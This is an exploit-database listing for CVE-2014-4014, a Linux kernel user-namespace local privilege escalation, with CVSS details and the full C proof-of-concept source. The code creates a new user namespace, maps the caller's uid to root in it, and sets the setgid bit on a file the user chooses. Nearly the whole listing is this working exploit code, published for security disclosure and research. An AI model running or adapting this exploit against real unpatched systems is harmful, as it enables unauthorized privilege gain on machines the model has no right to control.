Linux Kernel user namespace Local Privilege Escalation PoC

2014.06.22
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 6.2/10
Impact Subscore: 10/10
Exploitability Subscore: 1.9/10
Exploit range: Local
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/** * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC * * Vitaly Nikolenko * http://hashcrack.org * * Usage: ./poc [file_path] * * where file_path is the file on which you want to set the sgid bit */ #define _GNU_SOURCE #include <sys/wait.h> #include <sched.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <limits.h> #include <string.h> #include <assert.h> #define STACK_SIZE (1024 * 1024) static char child_stack[STACK_SIZE]; struct args { int pipe_fd[2]; char *file_path; }; static int child(void *arg) { struct args *f_args = (struct args *)arg; char c; // close stdout close(f_args->pipe_fd[1]); assert(read(f_args->pipe_fd[0], &c, 1) == 0); // set the setgid bit chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR); return 0; } int main(int argc, char *argv[]) { int fd; pid_t pid; char mapping[1024]; char map_file[PATH_MAX]; struct args f_args; assert(argc == 2); f_args.file_path = argv[1]; // create a pipe for synching the child and parent assert(pipe(f_args.pipe_fd) != -1); pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args); assert(pid != -1); // get the current uid outside the namespace snprintf(mapping, 1024, "0 %d 1\n", getuid()); // update uid and gid maps in the child snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid); fd = open(map_file, O_RDWR); assert(fd != -1); assert(write(fd, mapping, strlen(mapping)) == strlen(mapping)); close(f_args.pipe_fd[1]); assert (waitpid(pid, NULL, 0) != -1); }

References:

http://hashcrack.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top